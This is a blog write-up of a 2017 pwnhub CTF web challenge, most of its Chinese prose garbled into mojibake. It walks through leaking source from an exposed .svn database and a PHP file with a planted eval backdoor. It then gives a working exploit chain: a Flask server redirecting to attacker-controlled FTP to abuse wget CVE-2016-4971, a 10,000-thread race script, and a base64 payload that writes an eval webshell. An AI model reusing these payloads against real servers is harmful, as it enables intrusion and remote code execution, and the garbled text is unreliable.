LoRexxar's Blog

pwnhub_another php web閮ㄥ垎

2017/03/05

鍛ㄦ湯涓嶆槸澶湁鏃堕棿锛屾墍浠ュ氨娌℃庝箞鎵損wnhub锛屽悗鏉ュ揩缁撴潫鐨勬椂鍊欏畬鎴愪簡web閮ㄥ垎锛岃繖閲岃创涓妛eb閮ㄥ垎鐨剋p鍚

寮濮嬫病鍟ュ彲璇寸殑锛屽簲璇ユ槸鐢ㄦ潵褰撲竴浜涘捀楸肩殑鍚э紝index.php~

image_1bafa2nvpl7hl7n14d71sjk4g3m.png-15.1kB

鐧婚檰妗嗭紝楠岃瘉鐮佸緢鏅氱殑锛屾病鍟ュ彲璇寸殑锛岃瘯浜嗚瘯娌″暐鍙帺鐨勶紝閭e氨鎵洰褰曪紝鎵惧埌浜.svn

1
2
3
http://52.80.32.116/2d9bc625acb1ba5d0db6f8d0c8b9d206/.svn/
400

璺戣剼鏈嫋婧愮爜鎶ラ敊浜嗭紝鎼滀簡鎼滃ソ鍍忔槸鎷栫殑鏁版嵁搴撴姤閿欎簡锛屾墍浠ユ墜鍔ㄧ湅鐪嬶紝濂藉儚鏄唴瀹硅鏀硅繃浜

1
2
3
4
5
6
7
8
http://52.80.32.116/2d9bc625acb1ba5d0db6f8d0c8b9d206/.svn/wc.db
Myname:Pwnhub{6666666flag}
havefun:)
鐢ㄦ埛鍚嶅拰瀵嗙爜鐩稿悓
The a9b4d7cc810da015142f61f7e236d50b.php:)Welcome Pwnhub{6666666flag}

image_1bad45g037c73iessr9qgp4u9.png-33.2kB

婧愮爜鏄痯hpjm鍔犲瘑锛屾病鍟ュ彲璇寸殑锛岀洿鎺ュ伐鍏疯В

http://tool.lu/php/

鎷垮埌婧愮爜

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
<?php
error_reporting(E_ALL);
$firesun_path = '';
class Pwnhub
{
function __wakeup()
{
if (isset($_GET['pwnhub']) == "firesun") {
echo "Hacked by Firesun!";
eval(base64_decode($_POST['pwnhub']));
}
}
}
function pwnhubfile()
{
global $firesun_path;
file_put_contents($firesun_path . '/firesun', serialize($_SESSION));
}
session_start();
register_shutdown_function('pwnhubfile');
function set_context($id)
{
global $_SESSION, $firesun_path;
$firesun_path = '/var/www/data/' . $id;
if (!is_dir($firesun_path)) {
mkdir($firesun_path);
}
chdir($firesun_path);
if (!is_file('firesun')) {
$_SESSION = array();
} else {
$_SESSION = unserialize(file_get_contents('firesun'));
}
}
function download_image($url)
{
$url = parse_url($origUrl = $url);
if (isset($url['scheme']) && $url['scheme'] == 'http') {
if ($url['path'] == '/pwnhub.png') {
if (isset($url['query'])) {
die('byebyebye');
}
wget_wrapper($origUrl);
echo "Nice:)";
} else {
echo 'sorry!';
}
}
}
if (!isset($_SESSION['id'])) {
$sessId = bin2hex(openssl_random_pseudo_bytes(10));
$_SESSION['id'] = $sessId;
} else {
$sessId = $_SESSION['id'];
}
session_write_close();
set_context($sessId);
if (isset($_POST['image'])) {
$p = $_POST['image'];
if (stripos($p, 'php')) {
echo 'wow!!!';
die('byebye');
}
download_image($p);
echo '<img src="pwnhub.jpg" width=184 height=200/>';
} else {
die('no image:(');
}
?>
<!-- pwnhubs0urcec0d3.zip -->
<?php

鍏抽敭闂鍦ㄤ簬鎬庝箞鎺у埗firesun鏂囦欢鍐呭鈥.

鎴戜滑鐪嬬湅鎻愮ず

1
2017.03.04 21:20:00wget_wrapper灏辨槸wget锛屼笉瑕佹兂鐫鍦url涓婂仛鏂囩珷杩涜鍛戒护鎵ц锛岃繃婊ゅ緢涓ワ紝wget鐗堟湰杈冧綆锛wget鐗堟湰杈冧綆锛wget鐗堟湰杈冧綆锛岄噸瑕佺殑璇濊涓夐亶

鏍规嵁鎻愮ず鍜屾簮鐮侊紝鎴戜滑鍙戠幇鏄疭ECUINSIDE CTF Quals 2016 - Trendyweb鏀圭殑锛岀劧鍚庢壘鍒皐get婕忔礊CVE-2016-4971锛屽彂鐜颁竴绡噖p

http://quanyang.github.io/secuinside-ctf-quals-2016-trendyweb/

鏍规嵁wp鑷繁鐮旂┒鍙戠幇绠鍗曠殑鏂瑰紡琚拰璋愪簡锛屾墍浠ュ彧鑳界珵浜夎В鍐抽棶棰樸

杩欓噷绋嶅井姊崇悊涓嬬珵浜夐昏緫锛

1銆佽闂殑鏃跺欎細鐢熸垚鐙湁鐨剆essionid锛屽苟鎵цset_context($sessId);锛岃幏鍙杅iresun鏂囦欢鍐呭銆

2銆佸湪绗竴娆¤姹傜粨鏉熷悗锛宲wnhubfile浼氭墽琛岀敓鎴恌iresun

1
2
3
4
5
6
7
function pwnhubfile()
{
global $firesun_path;
file_put_contents($firesun_path . '/firesun', serialize($_SESSION));
}
register_shutdown_function('pwnhubfile');

浣嗘渶閲嶈鐨勯棶棰榳get鏄笉鑳借鐩栨枃浠剁殑锛屽鏋渨get鐩稿悓鏂囦欢鍚嶇殑锛屼細鍑虹幇firesun.1銆

涔熷氨鏄绗竴娆¤姹傜粨鏉熻繕娌¤兘鍙嶅簭鍒楀寲鎴愬姛锛屽氨浠h〃杩欓噷澶辫触浜嗐

鎵浠ユ垜浠瘡涓猻essionid鍙兘浣跨敤涓娆★紝杩欓噷闇瑕佷竴涓垚鐔熺殑澶氱嚎绋嬭剼鏈

鍏堥厤涓嚎涓婄幆澧冿紝寮涓涓猣lask鍔犱釜璺宠浆鑷砯tp

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/env python
from flask import Flask, redirect
app = Flask(__name__)
@app.route("/pwnhub.png")
def test():
return redirect("ftp://119.29.192.14/firesun")
if __name__ == "__main__":
app.run(host="0.0.0.0",port=8082)

鐒跺悗鍙︿竴涓湴鏂瑰紑涓猣tp锛岀鍙h涓洪粯璁21

1
sudo python -m pyftpdlib -p 21

鐩綍涓嬪啓涓猣iresun

1
O:6:"Pwnhub":0:{}

澶氱嚎绋嬭剼鏈

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import requests
import threading
import time
from random import Random
url = "http://52.80.32.116/2d9bc625acb1ba5d0db6f8d0c8b9d206/a9b4d7cc810da015142f61f7e236d50b.php"
def down(cookie):
data = {'image': 'http://119.29.192.14:8082/pwnhub.png'}
r = requests.post(url, data = data, cookies=cookie)
def ri(cookie):
s = requests.Session()
data = {'pwnhub': 'ZmlsZV9wdXRfY29udGVudHMoIi92YXIvd3d3L2h0bWwvMmQ5YmM2MjVhY2IxYmE1ZDBkYjZmOGQwYzhiOWQyMDYvaW1hZ2UvZGRvZ2UucGhwIiwgYmFzZTY0X2RlY29kZSgiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTWwwcE96OCsiKSk7'}
r = s.post(url + "?pwnhub=firesun", data = data, cookies=cookie)
if "Hacked by Firesun" in r.text:
print r.text
def random_str(randomlength=8):
str = ''
chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
length = len(chars) - 19
random = Random()
for i in range(randomlength):
str+=chars[random.randint(0, length)]
return str
for i in range(0,10000):
session = random_str(26)
cookie = {'PHPSESSID': session}
threading.Thread(target = down,args = (cookie,)).start()
threading.Thread(target = ri,args = (cookie,)).start()

鑳芥垚鍔燂紝浣嗘槸鍑犵巼涓嶉珮锛屾垜浠妸shell鍐欏叆鍒癷mage/涓

韪╀簡涓湝姹佸潙锛宐ase64_decode杩囧悗浼氭妸<?php ?>涓棿鐨勪笢瑗跨渷鐣ユ帀鈥︽墍浠ュ張鍔犱簡涓灞傘

1
2
3
4
5
6
7
<?php eval($_POST[2]);?
file_put_contents("/var/www/html/2d9bc625acb1ba5d0db6f8d0c8b9d206/image/ddoge.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1RbMl0pOz8+"));
ZmlsZV9wdXRfY29udGVudHMoIi92YXIvd3d3L2h0bWwvMmQ5YmM2MjVhY2IxYmE1ZDBkYjZmOGQwYzhiOWQyMDYvaW1hZ2UvZGRvZ2UucGhwIiwgYmFzZTY0X2RlY29kZSgiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTWwwcE96OCsiKSk7

寰堝鍑芥暟閮借繃婊や簡锛屾墍浠ュ彧鏈塭val鐨剋ebshell

1
exec,passthru,shell_exec,assert,glob,imageftbbox,bindtextdom,dir,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,symlink,chgrp,chmod,chown,dl,mail,readlink,stream_socket_server,fsocket,imap_mail,apache_child_terminate,posix_kill,proc_terminate,proc_get_status,syslog,openlog,ini_alter,chroot,fread,fgets,fgetss,file,readfile,ini_set,ini_restore,putenv,apache_setenv,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,fpassthru,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,fputs,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,highlight_file,show_source,copy,system,

image_1baf7qq8413qm1l5j8ff1dnn9u39.png-84.9kB

鍚瑅en甯堝倕璇村悗闈㈡槸pwn php锛屾垜灏变笉鑷姝昏矾浜嗭紝灏卞埌杩欓噷

CATALOG